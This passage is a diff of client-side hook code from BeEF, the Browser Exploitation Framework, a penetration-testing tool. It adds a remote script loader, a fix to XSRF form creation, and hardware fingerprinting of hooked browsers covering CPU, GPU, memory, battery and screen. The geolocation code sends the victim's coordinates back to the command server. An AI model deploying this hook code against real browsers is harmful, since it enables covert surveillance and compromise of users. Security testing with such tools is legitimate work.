-                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
                $j(document).attr('title', $j(this).html());
                document.body.scroll = "no";
                document.documentElement.style.overflow = 'hidden';
@@ -230,6 +230,13 @@ beef.dom = {
 		return form;
 	},
 	
+	loadScript: function(url) {
+	  var s = document.createElement('script');
+	  s.type = 'text/javascript';
+	  s.src = url;
+	  $j('body').append(s);
+	},
+
 	/**
 	 * Get the location of the current page.
 	 * @return: the location.
@@ -452,7 +459,13 @@ beef.dom = {
            var attributes = inputs[i];
            input = document.createElement('input');
                for(key in attributes){
-                    input.setAttribute(key, attributes[key]);
+                    if (key == 'name' && attributes[key] == 'submit') {
+                      // workaround for https://github.com/beefproject/beef/issues/1117
+                      beef.debug("createIframeXsrfForm - warning: changed form input 'submit' to 'Submit'");
+                      input.setAttribute('Submit', attributes[key]);
+                    } else {
+                      input.setAttribute(key, attributes[key]);
+                    }
                }
            formXsrf.appendChild(input);
        }
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/encode/json.js
+++ b/core/main/client/encode/json.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/geolocation.js
+++ b/core/main/client/geolocation.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -40,16 +40,17 @@ beef.geolocation = {
                },
            success: function(data, status, xhr){
                beef.debug("[geolocation.js] openstreetmap success");
-                var jsonResp = $j.parseJSON(data);
+                //var jsonResp = $j.parseJSON(data);

                beef.net.send(command_url, command_id, "latitude=" + latitude
                             + "&longitude=" + longitude
 //                             + "&osm=" + encodeURI(jsonResp.display_name)
-                              + "&osm=tofix"
+                              + "&osm=" + data.display_name
                             + "&geoLocEnabled=True");
                },
            type: "get",
-            url: "http://nominatim.openstreetmap.org/reverse?format=json&lat=" +
+	    dataType: "json",
+            url: "https://nominatim.openstreetmap.org/reverse?format=jsonv2&lat=" +
                latitude + "&lon=" + longitude + "&zoom=18&addressdetails=1"
        });

--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -11,7 +11,7 @@ beef.hardware = {
  /*
   * @return: {String} CPU type
   **/
-  cpuType: function() {
+  getCpuArch: function() {
    var arch = 'UNKNOWN';
    // note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
    // in detecting the OS arch rather than the browser build
@@ -37,6 +37,114 @@ beef.hardware = {
    return arch;
  },

+  /**
+   * Returns number of CPU cores
+   **/
+  getCpuCores: function() {
+    var cores = 'unknown';
+    try {
+      if(typeof navigator.hardwareConcurrency != 'undefined') {
+        cores = navigator.hardwareConcurrency;
+      }
+    } catch(e) {
+      cores = 'unknown';
+    }
+    return cores;
+  },
+
+  /**
+   * Returns CPU details
+   **/
+  getCpuDetails: function() {
+    return {
+      arch: beef.hardware.getCpuArch(),
+      cores: beef.hardware.getCpuCores()
+    }
+  },
+
+  /**
+   * Returns GPU details
+   **/
+  getGpuDetails: function() {
+    var gpu = 'unknown';
+    var vendor = 'unknown';
+    // use canvas technique:
+    // https://github.com/Valve/fingerprintjs2
+    // http://codeflow.org/entries/2016/feb/10/webgl_debug_renderer_info-extension-survey-results/
+    try {
+      var getWebglCanvas = function () {
+        var canvas = document.createElement('canvas')
+        var gl = null
+        try {
+          gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl')
+        } catch (e) { }
+        if (!gl) { gl = null }
+        return gl;
+      }
+
+      var glContext = getWebglCanvas();
+      var extensionDebugRendererInfo = glContext.getExtension('WEBGL_debug_renderer_info');
+      var gpu = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_RENDERER_WEBGL);
+      var vendor = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_VENDOR_WEBGL);
+      beef.debug("GPU: " + gpu + " - Vendor: " + vendor);
+    } catch (e) {
+      beef.debug('Failed to detect WebGL renderer: ' + e.toString());
+    }
+    return {
+      gpu: gpu,
+      vendor: vendor
+    }
+  },
+
+  /**
+   * Returns RAM (GiB)
+   **/
+  getMemory: function() {
+    var memory = 'unknown';
+    try {
+      if(typeof navigator.deviceMemory != 'undefined') {
+        memory = navigator.deviceMemory;
+      }
+    } catch(e) {
+      memory = 'unknown';
+    }
+    return memory;
+  },
+
+  /**
+   * Returns battery details
+   **/
+  getBatteryDetails: function() {
+    var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
+
+    if (!!battery) {
+      return {
+        chargingStatus: battery.charging,
+        batteryLevel: battery.level * 100 + "%",
+        chargingTime: battery.chargingTime,
+        dischargingTime: battery.dischargingTime
+      }
+    } else {
+      return {
+        chargingStatus: 'unknown',
+        batteryLevel: 'unknown',
+        chargingTime: 'unknown',
+        dischargingTime: 'unknown'
+      }
+    }
+  },
+
+  /**
+   * Returns zombie screen size and color depth.
+   */
+  getScreenSize: function () {
+    return {
+      width: window.screen.width,
+      height: window.screen.height,
+      colordepth: window.screen.colorDepth
+    }
+  },
+
  /*
   * @return: {Boolean} true or false.
   **/
@@ -49,7 +157,17 @@ beef.hardware = {
   * @return: {Boolean} true or false.
   **/
  isVirtualMachine: function() {
-    if (screen.width % 2 || screen.height % 2) return true;
+    if (this.getGpuDetails().vendor.match('VMware, Inc'))
+      return true;
+
+    if (this.isMobileDevice())
+      return false;
+
+    // if the screen resolution is uneven, and it's not a known mobile device
+    // then it's probably a VM
+    if (screen.width % 2 || screen.height % 2)
+      return true;
+
    return false;
  },

@@ -57,6 +175,7 @@ beef.hardware = {
   * @return: {Boolean} true or false.
   **/
  isLaptop: function() {
+    if (this.isMobileDevice()) return false;
    // Most common laptop screen resolution
    if (screen.width == 1366 && screen.height == 768) return true;
    // Netbooks
@@ -68,7 +187,7 @@ beef.hardware = {
   * @return: {Boolean} true or false.
   **/
  isNokia: function() {
-    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)|(Lumia )')) ? true : false;
  },

  /*
@@ -107,56 +226,68 @@ beef.hardware = {
  },

  /**
-   * Returns true if the browser is on a Mobile Phone
+   * Returns true if the browser is on a Mobile device
   * @return: {Boolean} true or false
   *
-   * @example: if(beef.hardware.isMobilePhone()) { ... }
+   * @example: if(beef.hardware.isMobileDevice()) { ... }
   **/
-  isMobilePhone: function() {
-    return DetectMobileQuick();
+  isMobileDevice: function() {
+    return MobileEsp.DetectMobileQuick();
+  },
+
+  /**
+   * Returns true if the browser is on a game console
+   * @return: {Boolean} true or false
+   *
+   * @example: if(beef.hardware.isGameConsole()) { ... }
+   **/
+  isGameConsole: function() {
+    return MobileEsp.DetectGameConsole();
  },

  getName: function() {
    var ua = navigator.userAgent.toLowerCase();
-    if(DetectIphone())              { return "iPhone"};
-    if(DetectIpod())                { return "iPod Touch"};
-    if(DetectIpad())                { return "iPad"};
+    if(MobileEsp.DetectIphone())              { return "iPhone"};
+    if(MobileEsp.DetectIpod())                { return "iPod Touch"};
+    if(MobileEsp.DetectIpad())                { return "iPad"};
    if (this.isHtc())               { return 'HTC'};
    if (this.isMotorola())          { return 'Motorola'};
    if (this.isZune())              { return 'Zune'};
    if (this.isGoogle())            { return 'Google Nexus One'};
    if (this.isEricsson())          { return 'Ericsson'};
-    if(DetectAndroidPhone())        { return "Android Phone"};
-    if(DetectAndroidTablet())       { return "Android Tablet"};
-    if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
-    if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
-    if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
-    if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
-    if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
-    if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+    if(MobileEsp.DetectAndroidPhone())        { return "Android Phone"};
+    if(MobileEsp.DetectAndroidTablet())       { return "Android Tablet"};
+    if(MobileEsp.DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+    if(ua.search(MobileEsp.deviceS60) > -1)   { return "Nokia S60"};
+    if(ua.search(MobileEsp.deviceS70) > -1)   { return "Nokia S70"};
+    if(ua.search(MobileEsp.deviceS80) > -1)   { return "Nokia S80"};
+    if(ua.search(MobileEsp.deviceS90) > -1)   { return "Nokia S90"};
+    if(ua.search(MobileEsp.deviceSymbian) > -1)   { return "Nokia Symbian"};
    if (this.isNokia())             { return 'Nokia'};
-    if(DetectWindowsPhone7())       { return "Windows Phone 7"};
-    if(DetectWindowsMobile())       { return "Windows Mobile"};
-    if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
-    if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
-    if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
-    if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
-    if(DetectBlackBerry())          { return "BlackBerry"};
-    if(DetectPalmOS())              { return "Palm OS"};
-    if(DetectPalmWebOS())           { return "Palm Web OS"};
-    if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
-    if(DetectArchos())              { return "Archos"}
-    if(DetectBrewDevice())          { return "Brew"};
-    if(DetectDangerHiptop())        { return "Danger Hiptop"};
-    if(DetectMaemoTablet())         { return "Maemo Tablet"};
-    if(DetectSonyMylo())            { return "Sony Mylo"};
-    if(DetectAmazonSilk())          { return "Kindle Fire"};
-    if(DetectKindle())              { return "Kindle"};
-    if(DetectSonyPlaystation())                 { return "Playstation"};
-    if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
-    if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
-    if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
-    if(DetectXbox())                            { return "Xbox"};
+    if(MobileEsp.DetectWindowsPhone7())       { return "Windows Phone 7"};
+    if(MobileEsp.DetectWindowsPhone8())       { return "Windows Phone 8"};
+    if(MobileEsp.DetectWindowsPhone10())      { return "Windows Phone 10"};
+    if(MobileEsp.DetectWindowsMobile())       { return "Windows Mobile"};
+    if(MobileEsp.DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+    if(MobileEsp.DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+    if(MobileEsp.DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+    if(MobileEsp.DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+    if(MobileEsp.DetectBlackBerry())          { return "BlackBerry"};
+    if(MobileEsp.DetectPalmOS())              { return "Palm OS"};
+    if(MobileEsp.DetectPalmWebOS())           { return "Palm Web OS"};
+    if(MobileEsp.DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+    if(MobileEsp.DetectArchos())              { return "Archos"}
+    if(MobileEsp.DetectBrewDevice())          { return "Brew"};
+    if(MobileEsp.DetectDangerHiptop())        { return "Danger Hiptop"};
+    if(MobileEsp.DetectMaemoTablet())         { return "Maemo Tablet"};
+    if(MobileEsp.DetectSonyMylo())            { return "Sony Mylo"};
+    if(MobileEsp.DetectAmazonSilk())          { return "Kindle Fire"};
+    if(MobileEsp.DetectKindle())              { return "Kindle"};
+    if(MobileEsp.DetectSonyPlaystation())                 { return "Playstation"};
+    if(ua.search(MobileEsp.deviceNintendoDs) > -1)        { return "Nintendo DS"};
+    if(ua.search(MobileEsp.deviceWii) > -1)               { return "Nintendo Wii"};
+    if(ua.search(MobileEsp.deviceNintendo) > -1)          { return "Nintendo"};
+    if(MobileEsp.DetectXbox())                            { return "Xbox"};
    if(this.isLaptop())                         { return "Laptop"};
    if(this.isVirtualMachine())                 { return "Virtual Machine"};

--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .2.4
 .5.3